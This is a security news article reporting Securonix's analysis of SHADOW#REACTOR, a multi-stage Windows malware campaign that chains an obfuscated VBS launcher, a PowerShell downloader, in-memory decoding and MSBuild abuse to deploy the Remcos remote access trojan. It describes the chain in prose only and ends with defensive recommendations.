Security researchers at Securonix have detailed a new multi-stage Windows malware campaign, tracked as SHADOW#REACTOR, that uses layered obfuscation and legitimate system tools to deliver the Remcos remote access trojan while evading detection.
According to the analysis, the campaign follows a carefully structured infection chain designed to minimise on-disk artefacts and blend in with normal system activity. The attack begins with an obfuscated Visual Basic Script (VBS) launcher executed via wscript.exe. This initial stage invokes a PowerShell-based downloader, which retrieves multiple fragmented, text-based payloads from a remote server.
Rather than delivering a single executable, the attackers split the malware into smaller components that are reconstructed locally. These fragments are reassembled into encoded loaders, which are then decoded entirely in memory by a .NET assembly protected using Reactor-style obfuscation. This approach helps the malware avoid traditional file-based detection mechanisms.
Once decoded, the loader retrieves a remote configuration for Remcos, a widely used remote access trojan. In the final stage of the infection chain, the malware abuses MSBuild.exe—a legitimate Microsoft build utility—as a living-off-the-land binary (LOLBin) to execute the payload. At this point, the Remcos backdoor is fully deployed, giving the attacker persistent control over the compromised system.
Securonix said the campaign appears to follow a broad and opportunistic targeting model, with activity observed primarily in general enterprise and small-to-medium business environments. There was no indication of sector-specific targeting or geopolitical alignment.
The tooling, delivery method and use of Remcos are consistent with financially motivated threat actors rather than advanced state-sponsored groups. Researchers assessed SHADOW#REACTOR as an unattributed loader framework designed to distribute Remcos at scale while reducing the likelihood of detection through in-memory execution, payload fragmentation and the abuse of trusted Windows utilities.
The findings highlight how commodity malware campaigns continue to adopt increasingly sophisticated techniques traditionally associated with higher-tier threats. By chaining together scripting languages, legitimate binaries and memory-only execution, attackers are able to bypass many conventional security controls, particularly in environments that rely heavily on signature-based detection.
Securonix said the campaign underscores the need for behavioural monitoring, visibility into script and LOLBin activity, and stronger controls around PowerShell and Windows scripting engines, especially in SMB and enterprise environments where such attacks remain common.
